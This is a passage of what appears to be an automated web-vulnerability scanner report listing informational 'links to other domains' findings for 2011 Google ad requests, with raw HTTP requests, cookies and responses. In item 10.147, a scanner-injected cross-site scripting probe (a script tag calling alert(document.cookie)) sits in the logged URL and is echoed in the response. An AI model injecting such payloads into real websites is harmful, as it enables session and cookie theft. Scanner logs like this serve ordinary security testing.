HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:24:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/article.php%253Fid%253D4030%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.Groupon.com/Chicago%26adT%3DChicago%2BCoupons%26gl%3DUS&amp;usg=AFQjCNG7hPo20hAc2dh1bdHCuxQgHlsTXw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.142. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-8682976704480862&output=html&h=90&slotname=7528172226&w=728&lmt=1302370206&flash=10.2.154&url=http%3A%2F%2Fwww.wptz.com%2Fnews%2Findex.html&dt=1302352206610&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352206660&frm=0&adk=1371640718&ga_vid=1441694128.1302352179&ga_sid=1302352179&ga_hid=256498022&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wptz.com%2Findex.html&fu=0&ifi=1&dtd=91&xpc=MJP4sbjUnE&p=http%3A//www.wptz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:30:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wptz.com/news/%26hl%3Den%26client%3Dca-pub-8682976704480862%26adU%3Dwww.AdrenalineWorkout.com%26adT%3DKrav%2BMaga%2Band%2Bfitness%26adU%3Dwww.Clickability.com%26adT%3DKnow%2Byour%2BWebsite%2BVisitor%26adU%3DNaviibk.com%26adT%3D5%2BFoods%2Byou%2Bmust%2Bnot%2Beat:%26gl%3DUS&amp;usg=AFQjCNGWYmGwTu_v72ybmdOZH-p7xjYKTA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.143. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639807&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&dt=1302621807836&shv=r20110406&jsv=r20110406&saldr=1&prev_slotnames=7816900575&correlator=1302621806890&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=1000755112&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=33895130&ref=http%3A%2F%2Fwww.mvtimes.com%2Fexpired.php&fu=0&ifi=2&dtd=3&xpc=MpcJCrCkh9&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/archives/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1647

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=exSuR-H6EUB7FK5H4foRQAAAAMDMzAhAexSuR-H6EUB7FK5H4foRQLUT8t-jzrw88f5MdWfsOnh1bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIACQ0BAgUCAAQAAAAA-STxIQAAAAA.&tt_code=&udj=uf%28%27a%27%2C+537%2C+1302621813%29%3Buf%28%27c%27%2C+5740%2C+1302621813%29%3Buf%28%27r%27%2C+294615%2C+1302621813%29%3Bppv%28783%2C+%274376600141129454517%27%2C+1302621813%2C+1303053813%2C+5740%2C+25553%29%3B&cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag..&referrer=http://www.mvtimes.com/archives/&pp=TaRudAAOmcEK2iJJnHAOj8xH-ELt9_fRJKHPFw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBcy5KdG6kTcGzOsnE6AaPncDjCe_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cubXZ0aW1lcy5jb20vYXJjaGl2ZXMvmALmC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxHWBRy21Ia8A2Ufi3YH0WXYgOK8w%26client%3Dca-pub-5597875046540809%26adurl%3D"></script>
...[SNIP]...
10.144. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&format=200x200_as&output=html&h=200&w=200&lmt=1302370252&ad_type=text_image&color_bg=FFFFFF&color_border=336699&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.vermontopia.com%2F&dt=1302352252377&shv=r20110330&jsv=r20110321-2&saldr=1&correlator=1302352252443&frm=0&adk=2806139730&ga_vid=1407274445.1302352252&ga_sid=1302352252&ga_hid=244053885&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1008&bih=768&eid=33895130&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18196&fu=0&ifi=1&dtd=85&xpc=rUqWJfd1wx&p=http%3A//www.vermontopia.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:30:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14590

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.vermontopia.com/%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.ShopAtHome.com%26adT%3DFree%2BCoupons%26adU%3Dwww.ArcticCatPartsHouse.com%26adT%3DArctic%2BCat%2BOEM%2BParts%26gl%3DUS&amp;usg=AFQjCNF_Zqumr74NwJJ1orhV9QeSsCohdQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.145. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370441&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352441841&bpp=2&shv=r20110330&jsv=r20110321-2&correlator=1302352441890&frm=0&adk=2815960337&ga_vid=781804837.1302352442&ga_sid=1302352442&ga_hid=1165843074&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&fu=0&ifi=1&dtd=142&xpc=ZSTKMvhTAq&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4368

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/category.asp%253FC%253D18836%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.acquisio.com%26adT%3D%26gl%3DUS&amp;usg=AFQjCNGdIaoXMEDjJAt5mzSoIiyr7VmQpg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.146. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:35:29 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1507

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script>
<script type='text/javascript' src='http://c1.rfihub.net/js/bcS.js'></script>
...[SNIP]...
10.147. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639916&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fclassifieds%2F110.php%2F%2522onmouseover302e4%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2c94143d614%3Dprompt(945581)%253E&dt=1302621915317&bpp=2&shv=r20110406&jsv=r20110406&prev_slotnames=4254550909&correlator=1302621915493&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=731217138&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fburp%2Fshow%2F4&fu=0&ifi=2&dtd=942&xpc=HQBIdP2rG4&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:25:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5147

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="300" HEIGHT="250"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CPHFqNe6udLoyQEQrAIY-gEyCBw56KQyZuRQ">
...[SNIP]...
17-YYV3mIS2Zg5KJA%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.lennar.com/New-Homes/Illinois/Chicago/Chicago/Library-Tower%253FWT.mc_id%253DCHBLEN_LNCU116294_WA_FinalOpp_300x250_GOOG_31611"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPHFqNe6udLoyQEQrAIY-gEyCBw56KQyZuRQ" id="google_flash_embed" WIDTH="300" HEIGHT="250" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBa_Di4G6kTeu5CJnU6AaY4p3BCrSJ8dsB7PDZvhmc9-fsDYCCpgEQARgBIIDYggI4AFD4n_Dl-v____8BYMnug4jwo-wSsgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBBNoBoQFodHRwOi8vd3d3Lm12dGltZXMuY29tL21hcnRoYXMtdmluZXlhcmQvY2xhc3NpZmllZHMvMTEwLnBocC8lMjJvbm1vdXNlb3ZlcjMwMmU0JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UyYzk0MTQzZDYxND1wcm9tcHQoOTQ1NTgxKSUzReABArgCGMACBMgC7JDCEagDAegDmgnoA7II6AOwKvUDAAQARPUDIAAAAA%26num%3D1%26sig%3DAGiWqtzMb9-D317Ai17-YYV3mIS2Zg5KJA%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.lennar.com/New-Homes/Illinois/Chicago/Chicago/Library-Tower%253FWT.mc_id%253DCHBLEN_LNCU116294_WA_FinalOpp_300x250_GOOG_31611" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%252522onmouseover302e4%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E2c94143d614%253Dprompt(945581)%25253E%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.lennar.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFHz6lKhTX-HArcZJbit1Ow5EEr_A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.148. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302372960&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D452989&dt=1302354959267&bpp=3&shv=r20110406&jsv=r20110406&correlator=1302354960314&frm=0&adk=2815960337&ga_vid=1068340600.1302354960&ga_sid=1302354960&ga_hid=1625284209&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D189321&fu=0&ifi=1&dtd=1058&xpc=inkZULsEaF&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 13:16:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7942

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/story.asp%253FS%253D452989%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.AAA.com%26adT%3DAAA%2BOfficial%2BSite%26adU%3Dwww.dstow.org%26adT%3DVehicle%2BRecovery%26adU%3Dwww.webuyjunkcarss.com%26adT%3DWe%2BBuy%2BJunk%2BCars%26adU%3DJoesRoadSideAssistance.com%26adT%3DMT%2BRoadside%2BAssistance%26gl%3DUS&amp;usg=AFQjCNH8NdTEVO1XiDt2vdNG0vvk0WSi_g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
10.149. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-9793946255016312&output=html&h=125&slotname=0288370364&w=125&lmt=1302370241&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html&dt=1302352241028&shv=r20110330&jsv=r20110321-2&saldr=1&correlator=1302352241030&frm=1&adk=3988729720&ga_vid=1441694128.1302352179&ga_sid=1302352179&ga_hid=405509947&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ifk=3902691550&eid=33895132&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:30:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000066;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
